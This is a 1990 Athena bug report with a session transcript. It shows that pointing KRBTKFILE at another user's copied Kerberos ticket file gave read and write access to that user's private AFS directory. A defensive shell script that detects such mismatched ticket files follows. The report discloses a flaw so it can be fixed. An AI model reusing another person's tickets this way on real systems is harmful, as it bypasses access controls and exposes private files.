[4418] in Athena Bugs
vax 6.4R: kerberos and afs
daemon@ATHENA.MIT.EDU (arnewman@ATHENA.MIT.EDU)
Mon Mar 5 16:36:31 1990
From: arnewman@ATHENA.MIT.EDU
To: bugs@ATHENA.MIT.EDU
Date: Mon, 05 Mar 90 16:35:52 EST
System name: akbar
Type and version: CVAXSTAR 6.4R
Display type: SM
What were you trying to do?

I was trying to prove that Kerberos would not allow the usage of someone
else's tickets. The tickets were created by the owner on a vax.

What's wrong:

I was able to use these tickets to read and write to directories to
which I had no access. The access control list on the
/mit/henry/private directory is:

Access list for . is
Normal rights:
  henry rlidwka

What should have happened:

I should have been denied both read and write access to this directory.

Please describe any relevant documentation references:

I am including a transcript of my session.

Script started on Mon Mar 5 16:21:10 1990
athena% klist
Ticket file: /tmp/tkt_ttyv0
Principal: arnewman@ATHENA.MIT.EDU
Issued Expires Principal
Mar 5 16:19:47 Mar 6 00:19:47 krbtgt.ATHENA.MIT.EDU@ATHENA.MIT.EDU
Mar 5 16:19:50 Mar 6 00:19:50 afs.athena.mit.edu@ATHENA.MIT.EDU
Mar 5 16:20:25 Mar 6 00:20:25 zephyr.zephyr@ATHENA.MIT.EDU
Mar 5 16:20:42 Mar 6 00:20:42 pop.athena-po-1@ATHENA.MIT.EDU
Mar 5 16:20:50 Mar 6 00:20:50 olc.matisse@ATHENA.MIT.EDU
athena% echo "Now setting KRBTKFILE to read forged ticket file."
Now setting KRBTKFILE to read forged ticket file.
athena% setenv KRBTKFILE ~/athena/tkt_henry
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
Principal: henry@ATHENA.MIT.EDU
Issued Expires Principal
Mar 5 16:02:09 Mar 6 00:02:09 krbtgt.ATHENA.MIT.EDU@ATHENA.MIT.EDU
Mar 5 16:02:11 Mar 6 00:02:11 rcmd.e40-008-10@ATHENA.MIT.EDU
Mar 5 16:02:15 Mar 6 00:02:15 afs.athena.mit.edu@ATHENA.MIT.EDU
Mar 5 16:04:36 Mar 6 00:04:36 zephyr.zephyr@ATHENA.MIT.EDU
Mar 5 16:04:43 Mar 6 00:04:43 pop.e40-po@ATHENA.MIT.EDU
Mar 5 16:04:52 Mar 6 00:04:52 olc.matisse@ATHENA.MIT.EDU
athena% tokens
Tokens held by the Cache Manager: (** marks primary identity)
[ 0] User ViceID=11373 for afs@athena.mit.edu [Expires Mar 6 00:19]
[ 1] --End of list--
athena% echo "Tokens still based on tickets received at original login."
Tokens still based on tickets received at original login.
athena% attach henry
henry: Already attached...mapping
Error while subscribing: Couldn't lock ticket file
athena% tokens
Tokens held by the Cache Manager: (** marks primary identity)
[ 0] User ViceID=11373 for afs@athena.mit.edu [Expires Mar 6 00:02]
[ 1] --End of list--
athena% cd /mit/henry/private
athena% ls
dot-login-for-testing resume.EZ txt
fcc.shar src
athena% cat dot-login-for-testing
# Prototype user .login file
# $Author: epeisach $
# $Source: /paris/source/4.3/prototype/RCS/.login,v $
# $Header: /paris/source/4.3/prototype/RCS/.login,v 1.14 89/08/14 17:43:17 epeisach Exp $
# This file sources a system-wide .login file, which:
# - presumes that the .cshrc file has been sourced
# - performs standard setups appropriate for tty session
# - runs standard startup activities (e.g., check mail)
# - source user file ~/.startup.tty, if it exists
set initdir=/usr/athena/lib/init
if (-r $initdir/login) then
source $initdir/login
else
if (-r /usr/prototype_user/.login) then
echo "If this is a workstation in a public cluster, you"
echo "should be getting the 6.3 upgrade within a few days."
echo "If this is a private workstation, please contact the"
echo "Athena Hotline at x3-1410 (by email: hotline@ATHENA),"
echo "in order to arrange to have your workstation upgraded."
source /usr/prototype_user/.login
else
echo "Warning: System-wide initialization files not found."
echo "Login initialization has not been performed."
endif
endif
# If you want to ADJUST the login initialization sequence, create a
# .startup.tty file in your home directory, with commands to run activities
# once the environment has been set up (znol, emacs, etc.).
# To adjust the environment initialization sequence, see the instructions in
# the .cshrc file.
# If you want to CHANGE the login initialization sequence, revise this .login
# file (the one you're reading now). You may want to copy the contents of
# the system-wide login file as a starting point.
#
# WARNING: If you revise this .login file, you will not automatically
# get any changes that Project Athena may make to the system-wide file at
# a later date. Be sure you know what you are doing.
athena% touch testfile
athena% ls -lag
total 49
drwx------ 4 henry wheel 2048 Mar 5 16:24 .
drwxrwxrwx 13 henry wheel 4096 Mar 5 16:09 ..
-rwx------ 1 henry wheel 1820 Mar 5 16:23 dot-login-for-testing
-rw------- 1 henry wheel 27586 Aug 1 1988 fcc.shar
-rw------- 1 henry wheel 8862 Jul 28 1989 resume.EZ
drwx------ 2 henry wheel 2048 Jul 29 1989 src
-rw------- 1 henry wheel 0 Mar 5 16:24 testfile
drwx------ 8 henry wheel 2048 Sep 28 15:35 txt
athena% tokens
Tokens held by the Cache Manager: (** marks primary identity)
[ 0] User ViceID=11373 for afs@athena.mit.edu [Expires Mar 6 00:02]
[ 1] --End of list--
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
klist: Can't lock ticket file; try later (tf_util)
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
klist: Can't lock ticket file; try later (tf_util)
athena% zwrite arnewman -m Test
zwrite: Couldn't lock ticket file while sending notice to arnewman
athena% cd / ls -lag /mit/arnewman/athena/tkt_henry
-rw------- 1 arnewman wheel 687 Mar 5 16:05 /mit/arnewman/athena/tkt_henry
athena% cd
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
klist: Can't lock ticket file; try later (tf_util)
athena% cd /mit/henry/private
athena% ls
dot-login-for-testing resume.EZ testfile
fcc.shar src txt
athena%
script done on Mon Mar 5 16:26:02 1990
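
A defender-side check for the condition shown in this transcript, as an added example that is not part of the original report: it reads the header of klist output and flags a ticket file whose principal differs from the account that owns the file, or that sits outside the default location. The function name, the rule that login names equal principal names, and the /tmp/tkt* default are assumptions; the sample input is copied from the transcript.

```sh
#!/bin/sh
# Added example, not from the original report. Assumption: the local login
# name equals the Kerberos principal name, and legitimate ticket files live
# under /tmp/tkt* (as in the first klist of the transcript).

# check_ticket_owner OWNER KLIST_OUTPUT
# Returns 0 if consistent, 1 if suspicious, 2 if the output cannot be parsed.
check_ticket_owner() {
    owner=$1
    tktfile=$(printf '%s\n' "$2" | sed -n 's/^Ticket file:[[:space:]]*//p' | head -n 1)
    principal=$(printf '%s\n' "$2" | sed -n 's/^Principal:[[:space:]]*//p' | head -n 1)
    if [ -z "$tktfile" ] || [ -z "$principal" ]; then
        echo "UNKNOWN: could not parse klist output"
        return 2
    fi
    # Kerberos 4 principals are name[.instance]@REALM; compare the name part.
    name=${principal%%@*}
    name=${name%%.*}
    result=0
    if [ "$name" != "$owner" ]; then
        echo "ALERT: $tktfile (owner $owner) holds tickets for $principal"
        result=1
    fi
    case $tktfile in
        /tmp/tkt*) ;;
        *) echo "ALERT: ticket file $tktfile is outside /tmp"
           result=1 ;;
    esac
    if [ "$result" -eq 0 ]; then
        echo "OK: $tktfile matches owner $owner"
    fi
    return "$result"
}

# klist headers copied from the two klist runs in the transcript.
LOGIN_KLIST='Ticket file: /tmp/tkt_ttyv0
Principal: arnewman@ATHENA.MIT.EDU'
COPIED_KLIST='Ticket file: /mit/arnewman/athena/tkt_henry
Principal: henry@ATHENA.MIT.EDU'

# The file owner comes from the "ls -lag" line in the transcript (arnewman).
check_ticket_owner arnewman "$LOGIN_KLIST" || true
check_ticket_owner arnewman "$COPIED_KLIST" || true
```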